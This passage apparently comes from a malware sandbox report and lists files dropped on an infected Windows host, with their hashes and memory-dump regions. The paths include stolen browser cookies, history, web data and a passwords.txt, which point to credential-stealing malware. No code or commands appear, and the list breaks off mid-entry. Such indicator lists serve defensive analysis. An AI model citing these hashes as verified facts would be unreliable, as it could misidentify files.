SHA256 e2dc6dcafb12b021712924d995906a2aa065e20a34bbc4e090f0d5cdd14fb09f
SHA512 4422170f47180e3644119ec9926f1bc5b86b0f57621c5cb50907fb820d6af48fe552c1c77d034b5a162aa2aa636d5d903c5c919ebeed058728826314b0ddd84c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

MD5 e5e3377341056643b0494b6842c0b544
SHA1 d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256 e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA512 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\22089026-46d3-4ae8-9fca-59808c4b674c.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\Desktop\a\swizzzz.exe

MD5 a74811b7e2d71612463144c69c0ca7e2
SHA1 900132a2213f70aed06e9982e47cfdcc8964b710
SHA256 3d07b09f83f2fc5dcb7f2429cac9a37160181da77df5a429e37b98dd685f239f
SHA512 c4c5bef04693f000ae1f45d2a2d28f67609f36a635464d5025a50b939eaf9cc8d7766355990847f5679375f3d4b760e035dd92914f754ae64df6923da1cecebe

memory/8924-31792-0x00000000073C0000-0x0000000007410000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe

MD5 73247ab5fb1b51677d85e3dcbd1d23af
SHA1 8f7bf1e75b3a279ec89cd330dfc2d6a2ee93d4a5
SHA256 30ffca4d25603e479223ababa825b47e2f65b37f24778ea07ce19a9c68494e3a
SHA512 0b09baea0d07bad1db75f1247f584ca881224240905466309514b586ac6eded5c6e399b5914644e053b6caa6fc03d85b60c14c9751edd838309bba741fca48aa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8a78823b869ddb2891bdd3d494dcc3c9
SHA1 afbb123c1054f3c15fbf228965f861da8a8c9007
SHA256 a241a7e8de2a3045140c053c589a559b31ae6127e6401572bd85f8c0407bdf44
SHA512 eafb736af447bb1d9a6a116d0083c9a6f7f217e5d700d19dbac47eafa72630ba8bbcd9a3753a2edc8ff3f00723afe64dde46f3047b608e510a499bb82f3e133c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\738e61cb-adf2-4dc9-8819-33109aa6cac9.tmp

MD5 7b959ed06f9ee25ddde948240fbf5e73
SHA1 7014903207f06cba0d6f73e55969a49ffc60117c
SHA256 7fd013181510cc8318005f1a89ea71457dea439ebf2d799e9cd5fc6d2dc5c3c9
SHA512 260e062ee5bce59f346575e62facdbefc1c1f7ec5a6a6eb46bdfd49626c916a1725ad869199c55c236784f57d86cb7380de42049697762f25a8fbf7061353fee

memory/3092-32200-0x00000000067B0000-0x00000000067C4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Albany.cmd

MD5 7290b064b7211ee58263434e7f3e5d06
SHA1 fabad9d3bcac72a0157daebc4d97441b15125a02
SHA256 4d3e9e90746157d6e091a3362f179641f73051fa4f8055c2af1e088584a508dc
SHA512 059a3f07ddd21eb50b60a83aea1eb4f446ec9b358d57a41259adb30038dfa38bbf5e5cb8d2b1baeb525f42bf9543d509d704629b924305358f6fb5b1097fb792

memory/6108-32230-0x00000269843C0000-0x00000269843CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\spanLfJbH8Ee5ZRB\_ElMhQ6YwDvOCookies

MD5 99b5b405940879427e53a219e4d11d87
SHA1 d4247cb6dac497067dde3ef7cf4236bf08ddeaae
SHA256 02295ce144c0f2f52d4a4d624b3520b57bcae76f952d2d6fe406188932c4b966
SHA512 d46cd5b146ca3b59d56daecbf565840ac218cb39615e0433f2f8295880dbd4df31e1886377c44f714344ac9effa6e9bb7ef155fc15d5744ae1e4ca7bb3ccf5bb

C:\Users\Admin\AppData\Local\Temp\trixyLfJbH8Ee5ZRB\passwords.txt

MD5 b3e9d0e1b8207aa74cb8812baaf52eae
SHA1 a2dce0fb6b0bbc955a1e72ef3d87cadcc6e3cc6b
SHA256 4993311fc913771acb526bb5ef73682eda69cd31ac14d25502e7bda578ffa37c
SHA512 b17adf4aa80cadc581a09c72800da22f62e5fb32953123f2c513d2e88753c430cc996e82aae7190c8cb3340fcf2d9e0d759d99d909d2461369275fbe5c68c27a

C:\Users\Admin\AppData\Local\Temp\spanLfJbH8Ee5ZRB\jwCcvu5TnQ5vWeb Data

MD5 8d51a9cc69a134927cebd748ce3ebbf6
SHA1 e0b67e017de017312bc078eaec93be10c03993ed
SHA256 ab6daeb239a1eb4ab735665b5ad171c6de08a4674ea3c480cc8e44a1584b81e1
SHA512 18ddb665613c2793bb2759b962563450e34e827b83e39198ac16ebec3fac1def33cbe087ff7ab33a89fe5b71b72beaae49a4105ad319f3289efa3e3958304aed

C:\Users\Admin\AppData\Local\Temp\spanLfJbH8Ee5ZRB\0uELqdwKONgUHistory

MD5 9618e15b04a4ddb39ed6c496575f6f95
SHA1 1c28f8750e5555776b3c80b187c5d15a443a7412
SHA256 a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512 f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

memory/7924-32395-0x0000000000520000-0x0000000000AFB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\spanLfJbH8Ee5ZRB\02zdBXl47cvzcookies.sqlite

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

C:\Users\Admin\Documents\SimpleAdobe\T9oPYIjlWlEIj0jBdIjNVP8M.exe

MD5 acbd4a6ccde355579adc10931734651f
SHA1 1fd3c14692fb29f62da7302cc5389371660948a3
SHA256 adc3be9d5cbb6f6cf5922f0f3a59b9891c950fda519633aa8db90cf1d8e6632e
SHA512 58d8e538ceacc4be13691a61cf6b05d5c2c7b703950ceb81b18f26fa629cd02ffc7cebaf92cb6eb734e872540d8d9ad60e5c4ab2a0c921ea9f863bcded306b25

C:\Users\Admin\Documents\SimpleAdobe\QMEkyU7Re9jGJRC5EdTZHC81.exe

MD5 693467b8b37ae95842e40bbcba468110
SHA1 f55877c634df98bbb4c43bbce3462e0fda2703cc
SHA256 ab5446244dd4f291fe0004f8e7a4921344b5e8198b7f4be371e1ed8f46c628cd
SHA512 12108f3d74d74b33c9f6ad6313c2c91eb134c0f56190c5a62662882d323c988cc5370f4600c7be0e9d09e734c5bc8a0f06aeb614ec0df70de936b096c1e37235

C:\Users\Admin\Documents\SimpleAdobe\6HhdBVHFi1YJ2E_gfCo77ZwX.exe

MD5 1fc71d8e8cb831924bdc7f36a9df1741
SHA1 8b1023a5314ad55d221e10fe13c3d2ec93506a6c
SHA256 609ef2b560381e8385a71a4a961afc94a1e1d19352414a591cd05217e9314625
SHA512 46e5e2e57cb46a96c5645555809713ff9e1a560d2ad7731117ef487d389319f97a339c3427385a313883a45c2b8d17ce9eec5ca2094efa3d432dd03d0ca3bb28

C:\Users\Admin\Documents\SimpleAdobe\uHNbZJI4JxwnevGgsCYWaO_A.exe

MD5 2f84ed6a99b05670c6194e34c15af5e9
SHA1 f16432077d2380c6af8ad657cbae238b0c593b9d
SHA256 a7ab2c787edf99461181701edf67560d86c81c9740253c18e33b7bb1cc882209
SHA512 9c78bd1ee10c8e45ed052e87316f74f5a73f805c9eff0fde300f9662d02d521e3167dc236672484d7f0a1fbd0a4d695f9b8a6d694a9e61d7901964926b88ad1e

C:\Users\Admin\Documents\SimpleAdobe\vHhB3WCcf_OiJQ9qqUWAhiRd.exe

MD5 f6f383aa4ae3f7a4d68f7a8866f1d1d5
SHA1 381fd797d250baba2d49724843a475e7b13f9ba5
SHA256 871352624fdb3dbfc502f6330fad63b51068f5bfe806dee2be4f2206580ef08d
SHA512 b9804ab2257f88fb90a845a1bc8e5c5335327318de42245fccc18cf6a1eb80d7c3eab646e272ecda85bfc47eba8c8359f509c0f94021ee51634dc44e2f1700b7

C:\Users\Admin\Desktop\a\fileosn.exe

MD5 84bf36993bdd61d216e83fe391fcc7fd
SHA1 e023212e847a54328aaea05fbe41eb4828855ce6
SHA256 8e6d8b5a004c8f21bee1bbe4213c6d78cf80e439b38f587e963e9bb4569aaffa
SHA512 bb3241949618ad2d39057e085e150f43b4d41d74efc4658d9c27f8c0ec80420191517a2c0b6b7e225c4e50e02cd031cdfd178e05b9a869847a3c27b210d09caf

C:\Users\Admin\Documents\SimpleAdobe\ZT0trHfwMfoxj5Giy8tYENXy.exe

MD5 ba6d3945e890984fdd036c9ef1674dfe
SHA1 b28d7cadac915edaf9a16528f845f9fac2cff28b
SHA256 69467ad1fa847ff055ab7c8fb1f357ec5dd64526797dd314f673a3544b1c3354
SHA512 a533cf50abd34bbac67f728d9a07eeda55d196361bca381649b6d9a584f9add509dad3fdb24f1d57e25b00fb6526d239c306d2529d7cb2e971777f08cf715f9a

memory/6460-32949-0x0000000000D80000-0x0000000000DD2000-memory.dmp

C:\Users\Admin\Documents\SimpleAdobe\QQm6sx_yddwRBb9dOYrDJLGI.exe

MD5 5f7324abc929cdf64e87149e4a8768eb
SHA1 932c1e1901fb28eefd389d7abbee7b90d8f28f02
SHA256 1c3aaf613bc3dd19508feb217795453863c6ad704336d4f598a7b3f245498c42
SHA512 6a8ec8ae6e0f1cf07f91df82234441ada0c099e2fa80ba2edce550364848c3597659c03828793e1607fc0f12c370c5fc97b08442aec2a027274b9de5b3dd7581

C:\Users\Admin\Documents\SimpleAdobe\r85qaXlqlPjESenqkcFUOYUi.exe

MD5 64e769e16f853835dd768a9b65626407
SHA1 87c0e29f2335809e3e70aaee47187db3ee8ceece
SHA256 5ece0d233ac404577a0ae14c8195299d239e4bbf3cb004b56cdeddf77de94733
SHA512 f275730523bbf75d6f96bef1255be756fd84ae570d0d5aae7f29a513da15b2d7f9b1b057912accb15be5de27e80067b2e83a07b4e78968cb412c2f0ffdd35879

C:\Users\Admin\Documents\SimpleAdobe\pbNR6iJSLR7ZNijuyU4PPgRH.exe

MD5 1b63f1085ee2abb7d4b8ab386b4f2bba
SHA1 02b243a47d25a376cae5d7564fb52fefaa84aba9
SHA256 f4b290d41975dcca1d451352645fbeef8390270c7af6b16a7da5f83203f13f06
SHA512 6a1dad9ea2ed6ca5cc8cdda7c6575f6b1fdc9ab225d6e6c8bcf222890504e2d5264e48d7ba52ec8dc677280a310fdc29fa75c3614e2ed68d6bf121cca160a23d

C:\Users\Admin\Documents\SimpleAdobe\1UgQG_toWzOoZeguQ02B_gvY.exe

MD5 91d78228ce5bab0d9cccd048c5a207fb
SHA1 5bcff410dd33f87ffbf75e2da7848832651fe7bc
SHA256 9f48cbee619b085895a7a374806130fa7b352a8fdae34a3d6218fc7a6358405e
SHA512 1442d5ebafc170649217a36ba2007c3102556015e55006c659d596c564f2daf7e1a9ae40e96aa82185c92f5ae4b8c3fc030174444750b6da6825422788937f15

memory/7924-33218-0x0000000000520000-0x0000000000AFB000-memory.dmp

memory/9156-33199-0x0000000000820000-0x0000000000E28000-memory.dmp

C:\Users\Admin\Documents\SimpleAdobe\qOEbDyAd6EEX7LBwv4iy9Juq.exe

MD5 50040aa4fcdf183865b768db08f93fc8
SHA1 442c47025a646e3bfecfc30f1fd229c7d083881c
SHA256 7b7ee47232cb322c12e53f733bdef460eb8ea8b4e96faf1c2b48220e263b1e1d
SHA512 97f3b59e2fc0ce87a4c3dc4fbce49d8d1fca17337f198d5fb6886088d380bb7c2ac82d478e872a56b3ce17487725a5f8586f3868c9f6cde2b80e88a3a415c0f0

memory/7464-33446-0x00000000001A0000-0x0000000000661000-memory.dmp

C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe

MD5 148b2c38cf0726535d760a703f803c80
SHA1 107503ca149f547d4745fe9b9a3fbae03d60126c
SHA256 30a110aa704b2beebbe56ad92cc4910defd943360d6bc10113e7fc17f9c31e7d
SHA512 6b9c13d80fb24924604245f9046c28df75d009c6cd6f819ef2ac6e99a592acfc84473b4fcc6e2c1ccafd6001bb4a931a8ced6a968bd874e2ebf81cd8c714bdbd

C:\Users\Admin\Documents\SimpleAdobe\qJS0UoGX0gnwbl3uy7DDA_wd.exe

MD5 3fcae847546386892c6a0d04363a7e4c
SHA1 8bbfd2960be40aead5af444a560a0ae8b2847259
SHA256 d30f2e8e26f7ff70cb07b21b1b8496a1fdb16403e11de0e7ba842e36bca5c26b
SHA512 49cae3222f46b9ebfa1c465f7bbb6b13b8b8ca22eba78f918a92bc2fdf5215cab33a10db7f2ba97d3532cff74994303c76ec3f00da880ea2819203e43fae3a45

memory/8332-33560-0x0000000000420000-0x00000000004A8000-memory.dmp

memory/7464-33729-0x00000000001A0000-0x0000000000661000-memory.dmp

C:\Users\Admin\Desktop\a\gold.exe

MD5 0b7e08a8268a6d413a322ff62d389bf9
SHA1 e04b849cc01779fe256744ad31562aca833a82c1
SHA256 d23a10b3ff0c565ea8ee7f54bcded0582e1e621ebad69d4523d6746f6d8e0e65
SHA512 3d226673e30bbbc27e0a5a6c64bf81eca475c697486b20141df7975bef97901d4865b88f41937f5e3dd00b437f24f91493f80cb69aa366b7a49cd17b26197ba4

memory/8332-34020-0x0000000007960000-0x000000000797A000-memory.dmp

memory/4064-34173-0x0000000000B10000-0x0000000000FD1000-memory.dmp

C:\Users\Admin\Desktop\a\5.exe

MD5 58f255cdde1639cac205467621bfcb70
SHA1 a264da537956dc2afd5ff41da29eba5b00995c56
SHA256 fdb833e1ad31cac0889e0ade3b8f48df9a6b484f9877b03330caf755ef3982cc
SHA512 3dcbc26ab8cd25396a6618f6ac5c125bb14ba6e00414e58c3b9b75cd44fca44950ad15ae1e904039797cff311c79a3d12c12edd33e040d1f1c8f5408abb98c3c

C:\Users\Admin\Desktop\a\Newoff.exe

MD5 0099a99f5ffb3c3ae78af0084136fab3
SHA1 0205a065728a9ec1133e8a372b1e3864df776e8c
SHA256 919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA512 5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

memory/4064-34689-0x0000000000B10000-0x0000000000FD1000-memory.dmp

C:\Users\Admin\Documents\SimpleAdobe\m7xcE61UtJIbnmp1rKRKw7tv.exe

MD5 d43ac79abe604caffefe6313617079a3
SHA1 b3587d3fa524761b207f812e11dd807062892335
SHA256 8b750884259dd004300a84505be782d05fca2e487a66484765a4a1e357b7c399
SHA512 bb22c73ed01ff97b73feb68ae2611b70ef002d1829035f58a4ba84c5a217db368aae8bdc02cdec59c1121922a207c662aa5f0a93377537da42657dd787587082

memory/3840-34988-0x0000000000AC0000-0x0000000000E78000-memory.dmp

memory/3840-35055-0x0000000005950000-0x0000000005B90000-memory.dmp

memory/3840-35109-0x0000000006CC0000-0x0000000006EE4000-memory.dmp

memory/3840-35143-0x0000000005090000-0x00000000050AC000-memory.dmp

memory/4696-35449-0x00000000064A0000-0x00000000064C2000-memory.dmp

memory/8332-35701-0x0000000005EF0000-0x0000000005F00000-memory.dmp

memory/8332-35738-0x0000000006130000-0x000000000618A000-memory.dmp

memory/9156-37341-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FEHPE754\YBNA2NLU.txt

MD5 1207bc197a1ebd72a77f1a771cad9e52
SHA1 8ed121ff66d407150d7390b9276fe690dd213b27
SHA256 260658b9cb063d6ce96f681b18704e02fae7bf8fc995fc249ab0be1400983476
SHA512 d037cfa3b6e6ced9652b2c781bb54cf48dbaa0aaff05039ae4fd0122749eda472807d4198981aa6ceffeba6d2b23d7ad08d7d96983dbd8539cf6b07e46e157f4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\a31c5d3e-4d7c-4a79-87cc-b34b2b65585f.dmp

MD5 582e2eef0a0ca67ab89a8cc397aed777
SHA1 7500be434f0637cc177baa6688e2ba0850bead5a
SHA256 afcf6281ecb8780461d85fabd4b3da6e1b00a0ad03072bbb895007f6e9653813
SHA512 9b44030e22bb3bacb8ac75ae102239f0181e4c5f27e3256eeb2400ffab038b64414491fccaf600f51cbb058fd403ac5bc3ee7d15ad45749ac3342fdb61b5f168

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\metadata

MD5 dcc368463a550e032eea38ee9d7555c7
SHA1 30080f8e6b27fbf3136e8e0c960b1a64361c568d
SHA256 aea74d3ebef21ecdc2661de9dc5fa1ceb5d1280e038ac0f707c052731671c1ff
SHA512 db698586ce5bce418ed8603b532bd56d826ba3b184763289cb164215f780436eb72478be1ba98daea8ffabc610e591858daf7b7b6494d603b864ec4c5c1c2e18

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 23757ed07e48d44307286952c68ec805
SHA1 c592ce51e6b0a2ac953d578a02e9b92ca6927a82
SHA256 7ea39c8d61be992783d37ddec9447b4e68dcfbb7a373a5d8770ee6cb0604abca
SHA512 c2270da887f919318759872bffda13de30ad002aa0b1a8382fff0c9ed35e04e82b886b240a73257150a92cba2fa326d20302bf7c77e8c6e7d86d0e0e2bf7445c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\962635be-7541-416b-b736-784112672d14.dmp

MD5 cab40c778591e0d16f4a0fe7db4a196f
SHA1 ceb06e15c8216de166b77440ca0e412e7eae5a75
SHA256 e75ae32efa2f2173c402481acee1dc594b0d9848f01e67e6e4389a9de7733ee0
SHA512 653d2bd0d62ef6d0d11f78f6f2d20d9763c2b9984dc1df1c7ce516e821087bbe82a041da0a7140d7fe1cc6a5b8bbf98a2542ff39655c985edf3bb73e8339671c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\d747ac4b-eee4-446f-a9fe-e4afa68505e5.dmp

MD5 5450c4817953a6ca83b47c0fbcff1240
SHA1 f8c77b365cf834a769e9d411d8de09e59ed8eee4
SHA256 1deb85bbf492217026993fa86c1159075fee1bb74989795db5f7a49f0edc105c
SHA512 d09993cb83eb403093bcc30852f0012a9254344aa6375c89ff91ae38706178a6e008cf8857f6844e5706ca3833232055c524b2a5905d1b27e27dd24fd28f6de6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 59ccf729073b75b6510f628699d140a1
SHA1 786fcc314a1a174bd80b10586bcceaf06806d98a
SHA256 7b2b8aa44ad55806629151b1a2f3628268898bfcba2ea82bb79359a888d4e34d
SHA512 d5753993125dd9f15bd3fe8a6d601560a6cad57a3a03b44731fbb4dbab5bd225e62bc3b2a639498d1e919a1087c72a3f1989a5f2112b7fcce37382e2bc4161d7

C:\Users\Admin\AppData\Local\Temp\7zSC3AF.tmp\__data__\config.txt

MD5 a105a47c98f80b8852960c96b87de57f
SHA1 564e75ca9dcf70541b6f89622f1728387b96571f
SHA256 6091181db52b0b2379c6d23966f50a0fc2109d2536f613f1235465774106e9f2
SHA512 50a62a5d9cf35833bd9162021cb29644cd455d725cd7b54b1cb1e364aa8b367aa233eba42fc976242ec538103344c8986c816e7e269aefe3873298ccc843e664

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 4bde8ffd446ee8be6d27378ca601fa3f
SHA1 d133ca6f3dcdbb8f93f746ab8c295529636e04c5
SHA256 e8422af58d4fe92d7519b5f99181fcf4c8a1e79538ba155f31d4e1ff840f2a6d
SHA512 f7ac25f537e14e26a95cfab2d2c648e6c68625598ea2c7371d3ac54f615305b32dfc19433cde0593d9a7c0672d79cffab6671b51a5b3678d10662f9585eb336e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\b46c82f0-d048-41b6-86f7-3a7da1ae46bb.dmp

MD5 5b4bfadc73ae24f53533f3c9caebd270
SHA1 13ece8dd053ca241b76d856b60d0fa3028fc09c2
SHA256 512bdf6cd6a829b2ecd6ac34dc1e1310ae3f6b5e47b9f384ca8af87bb86a9eb2
SHA512 2af5bdeb15b6455c60db86d87a770c20afc30ce69b69d7bdf6a103317893e86fcfeb54fa8fde4c06afe235d25fecfc64b8b66559616941b2c462374b8b447419

C:\Users\Admin\AppData\Local\Temp\edge_shutdown_crash.txt

MD5 06d49632c9dc9bcb62aeaef99612ba6b
SHA1 e91fe173f59b063d620a934ce1a010f2b114c1f3
SHA256 e79e418e48623569d75e2a7b09ae88ed9b77b126a445b9ff9dc6989a08efa079
SHA512 849b2f3f63322343fddc5a3c8da8f07e4034ee4d5eb210a5ad9db9e33b6aec18dea81836a87f9226a4636c6c77893b0bd3408f6d1fe225bb0907c556a8111355

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 8dc775fcc7fc81710c5f26daf1901c71
SHA1 c9f32642bc6d7db706b126d48ce86e9134273f55
SHA256 f723c44c14936b8aad6f1bb388c0219a234e642cf52099c3da78bbf17569ccf4
SHA512 0f34e3fe566f1de14aa8f6d0a212f64dbed0308d9ab1d2caf4adef07ac102bbe411b972c1f37e31fc64e069d324ad8a1ba9859bed20709c2aff096dbed628f2a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\11a849af-9d2e-46d1-a182-2bfac53a4f5a.dmp

MD5 9f6d7dc7e6b1fb0f9649775b95c4e07a
SHA1 6fc12d3f9473c375dd6cb2dd35e7eb99d2b1b634
SHA256 086c556d7a1cc521ec86d44248c373bb3d62529c41b2e8e94de53828f3cd35f9
SHA512 eba87c275ae4da13f236c592e84b2a06f1952d745a12b964afaad19c9cb08b69d6de00f0936497ef45fbb4465cb01e96fe52cdaca44b60068dca41cd9e27992e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 aaeee5f70ce2e30a401338086fb772a7
SHA1 5714eeda9ef60225da30d5fa151870ec273c9b7a
SHA256 5526a176c74d9c0c4ea21210e989855862642e67bbe5e5cbe874aa6f1179ffa9
SHA512 5a01672663374484e188305cc88fc81bb14cdf1931a5bbbdbe0184e72dddc71b9d392e18eb6044d3cd0e1061c9f71d42b8ee741795996910bda74a4c4eec7885

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\ae019e6a-2237-437f-8cbf-796ab0acec8d.dmp

MD5 b4b576f2c481d1f22c4be62b2da04259
SHA1 67a0031e7fc767c7a9b3d8ca613eb3c7ea60079b
SHA256 cc2adb70df558d0da25b8f8b12c463c9b8f887a61889e72d59a6fe87b1718a26
SHA512 2cdd9af705e759482d8f926d8d4b8bf048f60d91ebee710ea07634522c6e799c0cb795eb2a223b789825f133f6cef27538866ba63d12ba23ef2a287527bb385a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\bc6ca965-50e3-4d44-9460-280cc8d57f7b.dmp

MD5 14aa8a7707873725da7f38273c2f1111
SHA1 14238edc21e4b8f7abfdcc5fb8c94a6ce1969b8b
SHA256 9225b3d331b76b44f26ea1820e7c2703a0eeecbc4981d94d13cb058da38c260a
SHA512 f0833f4f72f67e69758f27ea061f87252a16094dcc140f10d5e086f5b4ef226239882f717dbb8f0845a85b7ccc1709e5dda5444cbb184670064c00cbbee31458

C:\Users\Admin\AppData\Local\Temp\1717260008_00000000_base\360base.dll

MD5 b192f34d99421dc3207f2328ffe62bd0
SHA1 e4bbbba20d05515678922371ea787b39f064cd2c
SHA256 58f13d919f44d194827b609b6b267246abc47134bb202472c0dfe033b9d7ed73
SHA512 00d4c7a0a0097eb4b31a71a0eaf6ff0d44619f77a335c75688565e34e6d7f4fb6c258917457d560c6b0a5077603845ce012e01d9862e87fb5327d7f8da970f95

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\0c5683f4-2db8-4245-9b86-05caf8cf8fea.dmp

MD5 ac1201a590c039da60c4a1647261c9e8
SHA1 57def3700aa75294057ee552f4e9bd635be3f88e
SHA256 2ebc46dce31e968817b03c65bdc3dee290198aa298665f8d10ad2455b0219988
SHA512 d6c88063c2dd76635634294d53ac6e851549f33f99c808d6561294e16ff492a63985b6b9d5b4298e4ed50207df71f864e7426a08d1e758e04ebf760d6cca6b34

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 e6fc5c220a7549201da0526171e3eaa1
SHA1 8e25b308619170a158f52cb81669601281c2e0c7
SHA256 467beecf043bca873160f46b98aa7ed937fc5b319434299f8d1e9d700cba59a3
SHA512 13512ce31d25771a09f694469b50fd08e65f16a33a94903201aef2ca97f9f6a0f715c2ecdb6e589dfabe3d1c84486556152331a2b795b9b6bb55d7cf474f1bca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\62576b4e-8c08-4b65-bc1f-bbd70c7d43a5.dmp

MD5 86db55f6368b765c9de54aa21b780182
SHA1 3401d914de7b7eb5c2c329771fae24a757285347
SHA256 99452036e0bc681bde6c38c35cd12577deacfafe6dc5f00d67f7656af0d84469
SHA512 0348dca4f55c4dc38c4a0af3e4b5c9c8f6677ace44801248f24d27efd9d99b1fb9a9d21cb2af87877bd45398b241423f494df6d0c013d08c1696b250a0ac8913

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 9118dedfae4fcf8efc36aa9158754481
SHA1 7d1ad50d020fa4d0dee33446b497b337b08c0a0b
SHA256 583e5f2be28ca0737b5b550ad9fd180b6af6614c6c310366603ce1cc1cfc260c
SHA512 acd1864a77a6cfb1ca8bdaacbe302068e0a6c29bd774678c7bcf48c09ad5502a0f673bde4e6101517bc243e23861b1d275bc588c35be56544c8ea283d958dde0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 2b8a63d228567d690ae020eddd64779e
SHA1 1a67edc6ee65d718155b8f4cbc7c172cd6e9bf6f
SHA256 83b076b339a25a53b36a2e43e274885536b95d2e794fc10806d6f1f9b267fc81
SHA512 032ede76e63be796af5e94a0d3c2afa49df4e140aeaf9d9d4c65e169ec700bf8a5e4f8df2c4bd4219befb2808f95d74b404d985f9d136a5e4362f279f75d875a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\8684c4e0-db23-44af-80c6-2ed2b510fff1.dmp

MD5 0230be06396b20bcaa0a2a5840844fd7
SHA1 b918ecaac28d62901e57c5131c88f099321ae40c
SHA256 3d5611c7ea160bf49f7f972dc760788d39bf11d8b851f51f0316224a52ef7764
SHA512 7b451f55e7e855c8bc96fcef578459c0fb012ff981864ef35b52833e027e9aacd9291dce930f5e781659e8efda38ec663e1588a2876283d2b0e882638f4e2bc0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 70b45eaabba392d71cfe0a6229021771
SHA1 5c4cfe138c9a3c207e9709374a4210f7b1039c74
SHA256 2a117ca1ce3afe8d4f79f665d65c372a37a355938d2187dd8ef96815ecd75beb
SHA512 8504253aa4a5448535dd5d6a07809396d2b6f9920648ef7b88291cbbee779459adf7ce0eca7535fa7b81c4f29cc512a65fad9072f43f254f173144c1eec88c53

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\9c572f74-fa5b-4714-ad0b-992871097001.dmp

MD5 97d1eea0fdf000e72ac1a53f263bc7ce
SHA1 022778b22cf3bfe1be6d50543eefa6ac8438a60e
